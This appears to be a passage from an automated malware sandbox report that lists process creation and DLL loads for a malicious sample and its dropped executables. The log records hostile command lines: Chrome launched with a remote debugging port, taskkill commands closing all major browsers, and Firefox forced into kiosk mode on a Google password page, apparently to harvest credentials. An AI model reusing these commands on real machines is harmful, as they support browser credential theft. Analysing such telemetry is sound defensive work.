                      Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-GB --service-sandbox-type=asset_store_service --mojo-platform-channel-handle=6904 --field-trial-handle=2172,i,17403516911943754986,3464347397962498854,262144 /prefetch:8Jump to behavior
                      Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=entity_extraction_service.mojom.Extractor --lang=en-GB --service-sandbox-type=entity_extraction --onnx-enabled-for-ee --mojo-platform-channel-handle=7068 --field-trial-handle=2172,i,17403516911943754986,3464347397962498854,262144 /prefetch:8Jump to behavior
                      Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.55\identity_helper.exe "C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.55\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=7560 --field-trial-handle=2172,i,17403516911943754986,3464347397962498854,262144 /prefetch:8Jump to behavior
                      Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.55\identity_helper.exe "C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.55\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=7560 --field-trial-handle=2172,i,17403516911943754986,3464347397962498854,262144 /prefetch:8Jump to behavior
                      Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2312 --field-trial-handle=2172,i,17403516911943754986,3464347397962498854,262144 /prefetch:3Jump to behavior
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\DocumentsKJEGCFBGDH.exe "C:\Users\user\DocumentsKJEGCFBGDH.exe"
                      Source: C:\Users\user\DocumentsKJEGCFBGDH.exeProcess created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe "C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe"
                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess created: C:\Users\user\AppData\Local\Temp\1007634001\824db60d2b.exe "C:\Users\user\AppData\Local\Temp\1007634001\824db60d2b.exe"
                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess created: C:\Users\user\AppData\Local\Temp\1007635001\8eeb449c35.exe "C:\Users\user\AppData\Local\Temp\1007635001\8eeb449c35.exe"
                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess created: C:\Users\user\AppData\Local\Temp\1007636001\241fdb96f6.exe "C:\Users\user\AppData\Local\Temp\1007636001\241fdb96f6.exe"
                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess created: C:\Users\user\AppData\Local\Temp\1007637001\846d486827.exe "C:\Users\user\AppData\Local\Temp\1007637001\846d486827.exe"
                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess created: C:\Users\user\AppData\Local\Temp\1007638001\fb696bafb5.exe "C:\Users\user\AppData\Local\Temp\1007638001\fb696bafb5.exe"
                      Source: C:\Users\user\AppData\Local\Temp\1007634001\824db60d2b.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9222 --profile-directory="Default"
                      Source: C:\Users\user\AppData\Local\Temp\1007634001\824db60d2b.exeProcess created: unknown unknown
                      Source: C:\Users\user\AppData\Local\Temp\1007634001\824db60d2b.exeProcess created: unknown unknown
                      Source: C:\Users\user\AppData\Local\Temp\1007635001\8eeb449c35.exeProcess created: unknown unknown
                      Source: C:\Users\user\AppData\Local\Temp\1007637001\846d486827.exeProcess created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM firefox.exe /T
                      Source: C:\Users\user\AppData\Local\Temp\1007637001\846d486827.exeProcess created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM chrome.exe /T
                      Source: C:\Users\user\AppData\Local\Temp\1007637001\846d486827.exeProcess created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM msedge.exe /T
                      Source: C:\Users\user\AppData\Local\Temp\1007637001\846d486827.exeProcess created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM opera.exe /T
                      Source: C:\Users\user\AppData\Local\Temp\1007637001\846d486827.exeProcess created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM brave.exe /T
                      Source: C:\Users\user\AppData\Local\Temp\1007637001\846d486827.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk "https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd" --no-default-browser-check --disable-popup-blocking
                      Source: C:\Users\user\AppData\Local\Temp\1007635001\8eeb449c35.exeProcess created: unknown unknown
                      Source: C:\Program Files\Mozilla Firefox\firefox.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd --no-default-browser-check --disable-popup-blocking
                      Source: C:\Program Files\Mozilla Firefox\firefox.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2300 -parentBuildID 20230927232528 -prefsHandle 2236 -prefMapHandle 2228 -prefsLen 25250 -prefMapSize 238690 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {b999cfbb-84d7-46b4-b70e-5bcaa2d69c0e} 5552 "\\.\pipe\gecko-crash-server-pipe.5552" 23758770b10 socket
                      Source: C:\Program Files\Mozilla Firefox\firefox.exeProcess created: unknown unknown
                      Source: C:\Program Files\Mozilla Firefox\firefox.exeProcess created: unknown unknown
                      Source: C:\Program Files\Mozilla Firefox\firefox.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=4208 -parentBuildID 20230927232528 -prefsHandle 4232 -prefMapHandle 4228 -prefsLen 26265 -prefMapSize 238690 -appDir "C:\Program Files\Mozilla Firefox\browser" - {7cd98799-25dd-4122-971c-e59e60cd92e0} 5552 "\\.\pipe\gecko-crash-server-pipe.5552" 2376ab5bd10 rdd
                      Source: C:\Program Files\Mozilla Firefox\firefox.exeProcess created: unknown unknown
                      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2624 --field-trial-handle=2536,i,9557238396092127338,18166861016205236946,262144 /prefetch:8
                      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                      Source: C:\Users\user\AppData\Local\Temp\1007637001\846d486827.exeProcess created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM firefox.exe /T
                      Source: C:\Users\user\AppData\Local\Temp\1007637001\846d486827.exeProcess created: unknown unknown
                      Source: C:\Users\user\AppData\Local\Temp\1007637001\846d486827.exeProcess created: unknown unknown
                      Source: C:\Users\user\AppData\Local\Temp\1007637001\846d486827.exeProcess created: unknown unknown
                      Source: C:\Users\user\AppData\Local\Temp\1007637001\846d486827.exeProcess created: unknown unknown
                      Source: C:\Users\user\AppData\Local\Temp\1007637001\846d486827.exeProcess created: unknown unknown
                      Source: C:\Users\user\Desktop\file.exeSection loaded: apphelp.dllJump to behavior
                      Source: C:\Users\user\Desktop\file.exeSection loaded: winmm.dllJump to behavior
                      Source: C:\Users\user\Desktop\file.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Users\user\Desktop\file.exeSection loaded: wininet.dllJump to behavior
                      Source: C:\Users\user\Desktop\file.exeSection loaded: rstrtmgr.dllJump to behavior
                      Source: C:\Users\user\Desktop\file.exeSection loaded: ncrypt.dllJump to behavior
                      Source: C:\Users\user\Desktop\file.exeSection loaded: ntasn1.dllJump to behavior
                      Source: C:\Users\user\Desktop\file.exeSection loaded: iertutil.dllJump to behavior
                      Source: C:\Users\user\Desktop\file.exeSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Users\user\Desktop\file.exeSection loaded: wldp.dllJump to behavior
                      Source: C:\Users\user\Desktop\file.exeSection loaded: profapi.dllJump to behavior
                      Source: C:\Users\user\Desktop\file.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Users\user\Desktop\file.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                      Source: C:\Users\user\Desktop\file.exeSection loaded: winhttp.dllJump to behavior
                      Source: C:\Users\user\Desktop\file.exeSection loaded: mswsock.dllJump to behavior
                      Source: C:\Users\user\Desktop\file.exeSection loaded: iphlpapi.dllJump to behavior
                      Source: C:\Users\user\Desktop\file.exeSection loaded: winnsi.dllJump to behavior
                      Source: C:\Users\user\Desktop\file.exeSection loaded: urlmon.dllJump to behavior
                      Source: C:\Users\user\Desktop\file.exeSection loaded: srvcli.dllJump to behavior
                      Source: C:\Users\user\Desktop\file.exeSection loaded: netutils.dllJump to behavior
                      Source: C:\Users\user\Desktop\file.exeSection loaded: dpapi.dllJump to behavior
                      Source: C:\Users\user\Desktop\file.exeSection loaded: cryptbase.dllJump to behavior
                      Source: C:\Users\user\Desktop\file.exeSection loaded: dnsapi.dllJump to behavior
                      Source: C:\Users\user\Desktop\file.exeSection loaded: fwpuclnt.dllJump to behavior
                      Source: C:\Users\user\Desktop\file.exeSection loaded: rasadhlp.dllJump to behavior
                      Source: C:\Users\user\Desktop\file.exeSection loaded: ntmarta.dllJump to behavior
                      Source: C:\Users\user\Desktop\file.exeSection loaded: mozglue.dllJump to behavior
                      Source: C:\Users\user\Desktop\file.exeSection loaded: wsock32.dllJump to behavior
                      Source: C:\Users\user\Desktop\file.exeSection loaded: vcruntime140.dllJump to behavior
                      Source: C:\Users\user\Desktop\file.exeSection loaded: msvcp140.dllJump to behavior
                      Source: C:\Users\user\Desktop\file.exeSection loaded: vcruntime140.dllJump to behavior
                      Source: C:\Users\user\Desktop\file.exeSection loaded: uxtheme.dllJump to behavior
                      Source: C:\Users\user\Desktop\file.exeSection loaded: propsys.dllJump to behavior
                      Source: C:\Users\user\Desktop\file.exeSection loaded: edputil.dllJump to behavior
                      Source: C:\Users\user\Desktop\file.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                      Source: C:\Users\user\Desktop\file.exeSection loaded: wintypes.dllJump to behavior
                      Source: C:\Users\user\Desktop\file.exeSection loaded: appresolver.dllJump to behavior
                      Source: C:\Users\user\Desktop\file.exeSection loaded: bcp47langs.dllJump to behavior
                      Source: C:\Users\user\Desktop\file.exeSection loaded: slc.dllJump to behavior
                      Source: C:\Users\user\Desktop\file.exeSection loaded: userenv.dllJump to behavior
                      Source: C:\Users\user\Desktop\file.exeSection loaded: sppc.dllJump to behavior
                      Source: C:\Users\user\Desktop\file.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                      Source: C:\Users\user\Desktop\file.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                      Source: C:\Users\user\Desktop\file.exeSection loaded: pcacli.dllJump to behavior
                      Source: C:\Users\user\Desktop\file.exeSection loaded: mpr.dllJump to behavior
                      Source: C:\Users\user\Desktop\file.exeSection loaded: sfc_os.dllJump to behavior
                      Source: C:\Windows\SysWOW64\cmd.exeSection loaded: apphelp.dll
                      Source: C:\Users\user\DocumentsKJEGCFBGDH.exeSection loaded: apphelp.dll
                      Source: C:\Users\user\DocumentsKJEGCFBGDH.exeSection loaded: winmm.dll
                      Source: C:\Users\user\DocumentsKJEGCFBGDH.exeSection loaded: wininet.dll
                      Source: C:\Users\user\DocumentsKJEGCFBGDH.exeSection loaded: sspicli.dll
                      Source: C:\Users\user\DocumentsKJEGCFBGDH.exeSection loaded: kernel.appcore.dll
                      Source: C:\Users\user\DocumentsKJEGCFBGDH.exeSection loaded: uxtheme.dll
                      Source: C:\Users\user\DocumentsKJEGCFBGDH.exeSection loaded: mstask.dll
                      Source: C:\Users\user\DocumentsKJEGCFBGDH.exeSection loaded: windows.storage.dll
                      Source: C:\Users\user\DocumentsKJEGCFBGDH.exeSection loaded: wldp.dll
                      Source: C:\Users\user\DocumentsKJEGCFBGDH.exeSection loaded: mpr.dll
                      Source: C:\Users\user\DocumentsKJEGCFBGDH.exeSection loaded: dui70.dll
                      Source: C:\Users\user\DocumentsKJEGCFBGDH.exeSection loaded: duser.dll
                      Source: C:\Users\user\DocumentsKJEGCFBGDH.exeSection loaded: chartv.dll
                      Source: C:\Users\user\DocumentsKJEGCFBGDH.exeSection loaded: onecoreuapcommonproxystub.dll
                      Source: C:\Users\user\DocumentsKJEGCFBGDH.exeSection loaded: oleacc.dll
                      Source: C:\Users\user\DocumentsKJEGCFBGDH.exeSection loaded: atlthunk.dll
                      Source: C:\Users\user\DocumentsKJEGCFBGDH.exeSection loaded: textinputframework.dll
                      Source: C:\Users\user\DocumentsKJEGCFBGDH.exeSection loaded: coreuicomponents.dll
                      Source: C:\Users\user\DocumentsKJEGCFBGDH.exeSection loaded: coremessaging.dll
                      Source: C:\Users\user\DocumentsKJEGCFBGDH.exeSection loaded: ntmarta.dll
                      Source: C:\Users\user\DocumentsKJEGCFBGDH.exeSection loaded: wintypes.dll
                      Source: C:\Users\user\DocumentsKJEGCFBGDH.exeSection loaded: wintypes.dll
                      Source: C:\Users\user\DocumentsKJEGCFBGDH.exeSection loaded: wintypes.dll
                      Source: C:\Users\user\DocumentsKJEGCFBGDH.exeSection loaded: wtsapi32.dll
                      Source: C:\Users\user\DocumentsKJEGCFBGDH.exeSection loaded: winsta.dll
                      Source: C:\Users\user\DocumentsKJEGCFBGDH.exeSection loaded: textshaping.dll
                      Source: C:\Users\user\DocumentsKJEGCFBGDH.exeSection loaded: propsys.dll
                      Source: C:\Users\user\DocumentsKJEGCFBGDH.exeSection loaded: explorerframe.dll
                      Source: C:\Users\user\DocumentsKJEGCFBGDH.exeSection loaded: windows.staterepositoryps.dll
                      Source: C:\Users\user\DocumentsKJEGCFBGDH.exeSection loaded: windows.fileexplorer.common.dll
                      Source: C:\Users\user\DocumentsKJEGCFBGDH.exeSection loaded: iertutil.dll
                      Source: C:\Users\user\DocumentsKJEGCFBGDH.exeSection loaded: profapi.dll
                      Source: C:\Users\user\DocumentsKJEGCFBGDH.exeSection loaded: edputil.dll
                      Source: C:\Users\user\DocumentsKJEGCFBGDH.exeSection loaded: urlmon.dll
                      Source: C:\Users\user\DocumentsKJEGCFBGDH.exeSection loaded: srvcli.dll
                      Source: C:\Users\user\DocumentsKJEGCFBGDH.exeSection loaded: netutils.dll
                      Source: C:\Users\user\DocumentsKJEGCFBGDH.exeSection loaded: appresolver.dll
                      Source: C:\Users\user\DocumentsKJEGCFBGDH.exeSection loaded: bcp47langs.dll
                      Source: C:\Users\user\DocumentsKJEGCFBGDH.exeSection loaded: slc.dll
                      Source: C:\Users\user\DocumentsKJEGCFBGDH.exeSection loaded: userenv.dll
                      Source: C:\Users\user\DocumentsKJEGCFBGDH.exeSection loaded: sppc.dll
                      Source: C:\Users\user\DocumentsKJEGCFBGDH.exeSection loaded: onecorecommonproxystub.dll
                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: apphelp.dll
                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: winmm.dll
                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: wininet.dll
                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: sspicli.dll
                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: iertutil.dll
                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: windows.storage.dll
                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: wldp.dll
                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: profapi.dll
                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: kernel.appcore.dll
                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: ondemandconnroutehelper.dll
                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: winhttp.dll
                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: mswsock.dll
                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: iphlpapi.dll
                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: winnsi.dll
                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: urlmon.dll
                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: srvcli.dll
                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: netutils.dll
                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: uxtheme.dll
                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: propsys.dll
                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: edputil.dll
                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: windows.staterepositoryps.dll
                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: wintypes.dll
                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: appresolver.dll
                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: bcp47langs.dll
                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: slc.dll
                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: userenv.dll
                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: sppc.dll
                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: onecorecommonproxystub.dll
                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: onecoreuapcommonproxystub.dll
                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: winmm.dll
                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: wininet.dll
                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: kernel.appcore.dll
                      Source: C:\Users\user\AppData\Local\Temp\1007634001\824db60d2b.exeSection loaded: apphelp.dll
                      Source: C:\Users\user\AppData\Local\Temp\1007634001\824db60d2b.exeSection loaded: winmm.dll
                      Source: C:\Users\user\AppData\Local\Temp\1007634001\824db60d2b.exeSection loaded: iphlpapi.dll
                      Source: C:\Users\user\AppData\Local\Temp\1007634001\824db60d2b.exeSection loaded: cryptbase.dll
                      Source: C:\Users\user\AppData\Local\Temp\1007634001\824db60d2b.exeSection loaded: cryptsp.dll
                      Source: C:\Users\user\AppData\Local\Temp\1007634001\824db60d2b.exeSection loaded: rsaenh.dll
                      Source: C:\Users\user\AppData\Local\Temp\1007634001\824db60d2b.exeSection loaded: dhcpcsvc6.dll
                      Source: C:\Users\user\AppData\Local\Temp\1007634001\824db60d2b.exeSection loaded: dhcpcsvc.dll
                      Source: C:\Users\user\AppData\Local\Temp\1007634001\824db60d2b.exeSection loaded: dnsapi.dll
                      Source: C:\Users\user\AppData\Local\Temp\1007634001\824db60d2b.exeSection loaded: napinsp.dll
                      Source: C:\Users\user\AppData\Local\Temp\1007634001\824db60d2b.exeSection loaded: pnrpnsp.dll
                      Source: C:\Users\user\AppData\Local\Temp\1007634001\824db60d2b.exeSection loaded: wshbth.dll
                      Source: C:\Users\user\AppData\Local\Temp\1007634001\824db60d2b.exeSection loaded: nlaapi.dll
                      Source: C:\Users\user\AppData\Local\Temp\1007634001\824db60d2b.exeSection loaded: mswsock.dll
                      Source: C:\Users\user\AppData\Local\Temp\1007634001\824db60d2b.exeSection loaded: winrnr.dll
                      Source: C:\Users\user\AppData\Local\Temp\1007634001\824db60d2b.exeSection loaded: napinsp.dll
                      Source: C:\Users\user\AppData\Local\Temp\1007634001\824db60d2b.exeSection loaded: pnrpnsp.dll
                      Source: C:\Users\user\AppData\Local\Temp\1007634001\824db60d2b.exeSection loaded: wshbth.dll
                      Source: C:\Users\user\AppData\Local\Temp\1007634001\824db60d2b.exeSection loaded: nlaapi.dll
                      Source: C:\Users\user\AppData\Local\Temp\1007634001\824db60d2b.exeSection loaded: winrnr.dll
                      Source: C:\Users\user\AppData\Local\Temp\1007634001\824db60d2b.exeSection loaded: sspicli.dll
                      Source: C:\Users\user\AppData\Local\Temp\1007634001\824db60d2b.exeSection loaded: uxtheme.dll
                      Source: C:\Users\user\AppData\Local\Temp\1007634001\824db60d2b.exeSection loaded: windowscodecs.dll
                      Source: C:\Users\user\AppData\Local\Temp\1007634001\824db60d2b.exeSection loaded: napinsp.dll
                      Source: C:\Users\user\AppData\Local\Temp\1007634001\824db60d2b.exeSection loaded: pnrpnsp.dll
                      Source: C:\Users\user\AppData\Local\Temp\1007634001\824db60d2b.exeSection loaded: wshbth.dll
                      Source: C:\Users\user\AppData\Local\Temp\1007634001\824db60d2b.exeSection loaded: nlaapi.dll
                      Source: C:\Users\user\AppData\Local\Temp\1007634001\824db60d2b.exeSection loaded: winrnr.dll
                      Source: C:\Users\user\AppData\Local\Temp\1007634001\824db60d2b.exeSection loaded: napinsp.dll
                      Source: C:\Users\user\AppData\Local\Temp\1007634001\824db60d2b.exeSection loaded: pnrpnsp.dll
                      Source: C:\Users\user\AppData\Local\Temp\1007634001\824db60d2b.exeSection loaded: wshbth.dll
                      Source: C:\Users\user\AppData\Local\Temp\1007634001\824db60d2b.exeSection loaded: nlaapi.dll
                      Source: C:\Users\user\AppData\Local\Temp\1007634001\824db60d2b.exeSection loaded: winrnr.dll
                      Source: C:\Users\user\AppData\Local\Temp\1007634001\824db60d2b.exeSection loaded: rasadhlp.dll
                      Source: C:\Users\user\AppData\Local\Temp\1007634001\824db60d2b.exeSection loaded: fwpuclnt.dll
                      Source: C:\Users\user\AppData\Local\Temp\1007634001\824db60d2b.exeSection loaded: dpapi.dll
                      Source: C:\Users\user\AppData\Local\Temp\1007634001\824db60d2b.exeSection loaded: windows.storage.dll
                      Source: C:\Users\user\AppData\Local\Temp\1007634001\824db60d2b.exeSection loaded: wldp.dll
                      Source: C:\Users\user\AppData\Local\Temp\1007634001\824db60d2b.exeSection loaded: kernel.appcore.dll
                      Source: C:\Users\user\AppData\Local\Temp\1007634001\824db60d2b.exeSection loaded: propsys.dll
                      Source: C:\Users\user\AppData\Local\Temp\1007634001\824db60d2b.exeSection loaded: dlnashext.dll
                      Source: C:\Users\user\AppData\Local\Temp\1007634001\824db60d2b.exeSection loaded: wpdshext.dll
                      Source: C:\Users\user\AppData\Local\Temp\1007634001\824db60d2b.exeSection loaded: profapi.dll
                      Source: C:\Users\user\AppData\Local\Temp\1007634001\824db60d2b.exeSection loaded: edputil.dll
                      Source: C:\Users\user\AppData\Local\Temp\1007634001\824db60d2b.exeSection loaded: urlmon.dll
                      Source: C:\Users\user\AppData\Local\Temp\1007634001\824db60d2b.exeSection loaded: iertutil.dll
                      Source: C:\Users\user\AppData\Local\Temp\1007634001\824db60d2b.exeSection loaded: srvcli.dll
                      Source: C:\Users\user\AppData\Local\Temp\1007634001\824db60d2b.exeSection loaded: netutils.dll
                      Source: C:\Users\user\AppData\Local\Temp\1007634001\824db60d2b.exeSection loaded: windows.staterepositoryps.dll
                      Source: C:\Users\user\AppData\Local\Temp\1007634001\824db60d2b.exeSection loaded: wintypes.dll
                      Source: C:\Users\user\AppData\Local\Temp\1007634001\824db60d2b.exeSection loaded: appresolver.dll
                      Source: C:\Users\user\AppData\Local\Temp\1007634001\824db60d2b.exeSection loaded: bcp47langs.dll
                      Source: C:\Users\user\AppData\Local\Temp\1007634001\824db60d2b.exeSection loaded: slc.dll
                      Source: C:\Users\user\AppData\Local\Temp\1007634001\824db60d2b.exeSection loaded: userenv.dll
                      Source: C:\Users\user\AppData\Local\Temp\1007634001\824db60d2b.exeSection loaded: sppc.dll
                      Source: C:\Users\user\AppData\Local\Temp\1007634001\824db60d2b.exeSection loaded: onecorecommonproxystub.dll
                      Source: C:\Users\user\AppData\Local\Temp\1007634001\824db60d2b.exeSection loaded: onecoreuapcommonproxystub.dll
                      Source: C:\Users\user\AppData\Local\Temp\1007635001\8eeb449c35.exeSection loaded: apphelp.dll
                      Source: C:\Users\user\AppData\Local\Temp\1007635001\8eeb449c35.exeSection loaded: winmm.dll
                      Source: C:\Users\user\AppData\Local\Temp\1007635001\8eeb449c35.exeSection loaded: windows.storage.dll
                      Source: C:\Users\user\AppData\Local\Temp\1007635001\8eeb449c35.exeSection loaded: wldp.dll
                      Source: C:\Users\user\AppData\Local\Temp\1007635001\8eeb449c35.exeSection loaded: winhttp.dll
                      Source: C:\Users\user\AppData\Local\Temp\1007635001\8eeb449c35.exeSection loaded: ondemandconnroutehelper.dll
                      Source: C:\Users\user\AppData\Local\Temp\1007635001\8eeb449c35.exeSection loaded: webio.dll
                      Source: C:\Users\user\AppData\Local\Temp\1007635001\8eeb449c35.exeSection loaded: mswsock.dll
                      Source: C:\Users\user\AppData\Local\Temp\1007635001\8eeb449c35.exeSection loaded: iphlpapi.dll
                      Source: C:\Users\user\AppData\Local\Temp\1007635001\8eeb449c35.exeSection loaded: winnsi.dll
                      Source: C:\Users\user\AppData\Local\Temp\1007635001\8eeb449c35.exeSection loaded: sspicli.dll
                      Source: C:\Users\user\AppData\Local\Temp\1007635001\8eeb449c35.exeSection loaded: dnsapi.dll
                      Source: C:\Users\user\AppData\Local\Temp\1007635001\8eeb449c35.exeSection loaded: rasadhlp.dll
                      Source: C:\Users\user\AppData\Local\Temp\1007635001\8eeb449c35.exeSection loaded: fwpuclnt.dll
                      Source: C:\Users\user\AppData\Local\Temp\1007635001\8eeb449c35.exeSection loaded: schannel.dll
                      Source: C:\Users\user\AppData\Local\Temp\1007635001\8eeb449c35.exeSection loaded: mskeyprotect.dll
                      Source: C:\Users\user\AppData\Local\Temp\1007635001\8eeb449c35.exeSection loaded: ntasn1.dll
                      Source: C:\Users\user\AppData\Local\Temp\1007635001\8eeb449c35.exeSection loaded: ncrypt.dll
                      Source: C:\Users\user\AppData\Local\Temp\1007635001\8eeb449c35.exeSection loaded: ncryptsslp.dll
                      Source: C:\Users\user\AppData\Local\Temp\1007635001\8eeb449c35.exeSection loaded: msasn1.dll
                      Source: C:\Users\user\AppData\Local\Temp\1007635001\8eeb449c35.exeSection loaded: cryptsp.dll
